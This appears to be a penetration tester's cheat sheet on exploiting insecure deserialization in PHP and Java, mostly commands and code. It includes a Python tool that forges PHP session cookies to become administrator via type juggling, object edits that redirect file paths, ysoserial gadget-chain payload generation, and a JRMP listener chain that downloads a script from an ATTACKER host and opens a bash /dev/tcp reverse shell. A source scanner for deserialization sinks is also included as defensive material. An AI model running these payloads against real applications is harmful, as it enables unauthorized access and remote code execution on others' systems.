Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that calls ObjectInputStream.readObject(), the method that reads an object from an InputStream and deserializes it.
The native methods for PHP serialization are serialize() and unserialize(). If you have source code access, you should start by looking for unserialize().
Basic Serialization - look for cookies that are base64 encoded or otherwise look serialized. If the decoded value contains something like s:5:"admin";b:0; you can change b:0 to b:1 (PHP serializes booleans as b:0 / b:1), re-encode it and resend --> which makes us admin.
PHP - Exploiting Data Types - Look for cookies and any other serialized values. Update the user value or the username to any user; if an access token is also checked, change the token's type instead of guessing its value, re-serialize and try to access unauthorized data. This works because of PHP's loose comparison (==): in PHP 7 and earlier the integer 0 compares equal to any non-numeric string (PHP 8 changed this), so a check such as $token == $user->access_token passes when the token is sent as i:0. Whenever you change a string, also update its s:N: length prefix, otherwise unserialize() rejects the object.
Example - update the data from
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";}
to
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}
Always try to update the content in the serialized object. Example - point a path attribute at another file, so that whatever the application does with the avatar (read it, delete it) now happens to that file instead; update the object from
O:4:"User":3:{s:8:"username";s:5:"gregg";s:12:"access_token";s:32:"favhu4mwxv64b6mz5x6ga79wxs5k95op";s:11:"avatar_link";s:18:"users/gregg/avatar";}
to
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"zp46h5h7j8dbk07k04e57dgu67ayxsy7";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
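The cookie edits above (the admin flag flip and both User object rewrites) done programmatically, as an added example that is not part of the original page: a small Python parser and serializer for PHP's format that recomputes the s:N: length prefixes for you, so a changed username or path cannot break the object. The objects are the page's own samples; that the cookie is a URL-encoded base64 blob is an assumption about the application.

```python
"""Tamper with a PHP-serialized session object. Added example, not from the page.
Implements enough of PHP's serialize() format (b, i, s, a, O) to parse a cookie,
change property values or their types, and write it back with correct s:N: length
prefixes. That the cookie is URL-encoded base64 is an assumption about the app.
"""
import base64
from dataclasses import dataclass
from urllib.parse import quote, unquote


@dataclass
class PhpObject:
    cls: str
    props: dict


class _Parser:
    def __init__(self, data: str):
        self.s, self.i = data, 0

    def _until(self, ch: str) -> str:      # read up to a delimiter and consume it
        j = self.s.index(ch, self.i)
        tok, self.i = self.s[self.i:j], j + 1
        return tok

    def _expect(self, ch: str) -> None:
        if self.s[self.i] != ch:
            raise ValueError(f"expected {ch!r} at offset {self.i}")
        self.i += 1

    def _members(self, n: int) -> dict:     # n key/value pairs inside { }
        self._expect("{")
        out = {}
        for _ in range(n):
            key = self.value()
            out[key] = self.value()
        self._expect("}")
        return out

    def value(self):
        t = self.s[self.i]
        self.i += 1
        self._expect(":")
        if t == "b":
            return self._until(";") == "1"
        if t == "i":
            return int(self._until(";"))
        if t == "s":                        # s:<byte length>:"<data>";
            n = int(self._until(":"))
            self._expect('"')
            val = self.s[self.i:self.i + n]  # ASCII assumed: PHP counts bytes, not chars
            self.i += n
            self._expect('"')
            self._expect(";")
            return val
        if t == "a":
            return self._members(int(self._until(":")))
        if t == "O":                        # O:<len>:"<class>":<count>:{...}
            self._until(":")
            cls = self._until(":").strip('"')
            return PhpObject(cls, self._members(int(self._until(":"))))
        raise ValueError(f"unsupported type {t!r} at offset {self.i - 1}")


def php_unserialize(data: str):
    return _Parser(data).value()


def php_serialize(v) -> str:
    if isinstance(v, bool):                 # before int: bool is an int subclass
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):                  # length prefix is in bytes
        return f's:{len(v.encode())}:"{v}";'
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return f"a:{len(v)}:{{{body}}}"
    if isinstance(v, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.props.items())
        return f'O:{len(v.cls)}:"{v.cls}":{len(v.props)}:{{{body}}}'
    raise TypeError(f"cannot serialize {type(v).__name__}")


def decode_cookie(cookie: str) -> str:      # assumed cookie wrapper: URL-encoded base64
    return base64.b64decode(unquote(cookie)).decode()


def encode_cookie(serialized: str) -> str:
    return quote(base64.b64encode(serialized.encode()).decode())


def tamper_cookie(cookie: str, changes: dict) -> str:
    obj = php_unserialize(decode_cookie(cookie))
    obj.props.update(changes)               # new string lengths are recomputed on output
    return encode_cookie(php_serialize(obj))


def forge_admin(cookie: str) -> str:
    # i:0 instead of a string: under PHP 7 loose comparison, 0 == "<any token>" is true
    return tamper_cookie(cookie, {"username": "administrator", "access_token": 0})


if __name__ == "__main__":
    wiener = ('O:4:"User":2:{s:8:"username";s:6:"wiener";'
              's:12:"access_token";s:32:"msai659yp7cfu0magd7vm3siq9ls2cld";}')
    print(decode_cookie(forge_admin(encode_cookie(wiener))))
```

Replace the value passed to forge_admin() with the session cookie captured in Burp; the printed line is the object the server will unserialize, so check it against the target shape before sending. Property keys of private and protected members carry NUL-delimited prefixes in real PHP output, which this parser would read through but not interpret.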
Magic Methods
Magic methods are a special subset of methods that you do not have to explicitly invoke. Instead, they are invoked automatically whenever a particular event or scenario occurs. A common example is __construct(), which is invoked whenever an object of the class is instantiated, similar to Python's __init__.
Some languages have magic methods that are invoked automatically during the deserialization process. For example, PHP's unserialize() looks for and invokes an object's __wakeup() magic method. In Java deserialization, the same applies to the ObjectInputStream.readObject() method, which reads data from the initial byte stream and essentially acts like a constructor for "re-initializing" a serialized object. However, Serializable classes can also declare their own readObject() method as follows:
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        // implementation
    }
A readObject() method declared in exactly this way (private, returning void, taking a single ObjectInputStream parameter) acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.
You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.
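The source review the Java and PHP paragraphs above describe (find unserialize() and readObject() sinks, Serializable classes, and the magic methods that run during deserialization), as an added example that is not part of the original page: a Python scanner that encodes those checks as regexes and tells a plain call to in.readObject() apart from the exact private readObject(ObjectInputStream) declaration that the JVM treats as a magic method. The two source files it scans are constructed samples; besides __wakeup(), which the text names, the PHP rule also matches __destruct(), which runs when a deserialized object is freed.

```python
"""Locate deserialization sinks and magic methods in source. Added example, not from the page.
The regexes encode the review checklist: unserialize() calls and __wakeup()/__destruct()
declarations in PHP; ObjectInputStream.readObject() calls, Serializable classes and the exact
private readObject(ObjectInputStream) signature in Java. The sample sources are constructed.
"""
import re
import tempfile
from pathlib import Path

RULES = {
    ".php": [
        ("sink", re.compile(r"\bunserialize\s*\(")),
        ("magic", re.compile(r"function\s+(__wakeup|__destruct)\s*\(")),
    ],
    ".java": [
        ("sink", re.compile(r"\.readObject\s*\(")),
        ("serializable", re.compile(r"\bimplements\b[^{]*\bSerializable\b")),
        # only this exact signature is invoked by ObjectInputStream during deserialization
        ("magic", re.compile(
            r"private\s+void\s+readObject\s*\(\s*(?:java\.io\.)?ObjectInputStream\s+\w+\s*\)")),
    ],
}


def scan_text(text: str, suffix: str) -> list:
    """Return (kind, line number, stripped line) for every rule hit, in file order."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in RULES.get(suffix, []):
            if rx.search(line):
                hits.append((kind, lineno, line.strip()))
    return hits


def scan_tree(root: Path) -> dict:
    """Map relative file path -> hits for every .php/.java file under root."""
    found = {}
    for path in sorted(root.rglob("*")):
        if path.suffix in RULES:
            hits = scan_text(path.read_text(errors="replace"), path.suffix)
            if hits:
                found[str(path.relative_to(root))] = hits
    return found


# Constructed sample: the cookie sink plus a destructor that acts on attacker-controlled data.
SAMPLE_PHP = """<?php
class User {
    public $avatar_link;
    function __destruct() { unlink($this->avatar_link); }   // runs when the object is freed
}
$user = unserialize(base64_decode($_COOKIE["session"]));
"""

# Constructed sample: a Serializable class with the magic readObject() and a separate sink.
SAMPLE_JAVA = """import java.io.*;
public class User implements Serializable {
    private String avatarLink;
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        new File(avatarLink).delete();   // field value used before the object is fully restored
    }
}
class Session {
    Object load(byte[] b) throws Exception { return new ObjectInputStream(new ByteArrayInputStream(b)).readObject(); }
}
"""

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "User.php").write_text(SAMPLE_PHP)
        (root / "User.java").write_text(SAMPLE_JAVA)
        for file, hits in scan_tree(root).items():
            for kind, lineno, line in hits:
                print(f"{file}:{lineno}: [{kind}] {line}")
```

Point scan_tree() at a checked-out code base; a "magic" hit in a class that is also "serializable" is the place to read first, and every "sink" hit needs a trace back to where its bytes come from (a cookie, a request body, a message queue).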
YSOSerial
# Requires Java 11 to run
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version
# Download the latest package from https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080"
# base64-encode on a single line (-w 0 disables line wrapping) so the payload can be pasted into a cookie or parameter
java -jar ysoserial-all.jar CommonsCollections4 "nc 10.10.10.10 8080" | base64 -w 0 > output.txt
# A little automation - generate every payload type at once; the names come from ysoserial's usage listing (printed when it is run without arguments)
java -jar ../ysoserial.jar > yso 2>&1
cat yso | tr -d ' ' | cut -d "@" -f 1 | sed '1,8d' > payloads.txt
while read payloadname; do java -jar ../ysoserial.jar "$payloadname" "ping 10.10.10.10 -c 3" | base64 -w 0 > "$payloadname"; done < payloads.txt
# Run tcpdump to check whether the target pings back - the file name that triggers it tells you which gadget chain works
sudo tcpdump -i tap0 icmp
Or, better, use the Burp extensions Java Serial Killer and Java Deserialization Scanner.
Exploiting Insecure Deserialization using JRMP
# Host the reverse shell script over HTTP
python -m http.server 8000
# rev.sh
bash -c 'exec bash -i &>/dev/tcp/ATTACKER/9001 <&1'
# Catch the shell
nc -lvnp 9001
# Start a JRMP listener; the gadget chain (here CommonsCollections3) runs the command when the target connects back
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections3 "curl http://ATTACKER:8000/rev.sh -o /tmp/rev.sh; bash /tmp/rev.sh"
# Generate the JRMPClient payload pointing at the listener and send it to the application
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:80 | base64 -w 0 > output.txt
# Second stage: a new listener on another port that only executes the script already downloaded to /tmp (the client payload must point at the same port)
java -cp /usr/local/bin/ysoserial-all.jar ysoserial.exploit.JRMPListener 81 CommonsCollections3 "bash /tmp/rev.sh"
# Generate the second payload and send it
java -jar /usr/local/bin/ysoserial-all.jar JRMPClient ATTACKER:81 | base64 -w 0 > output2.txt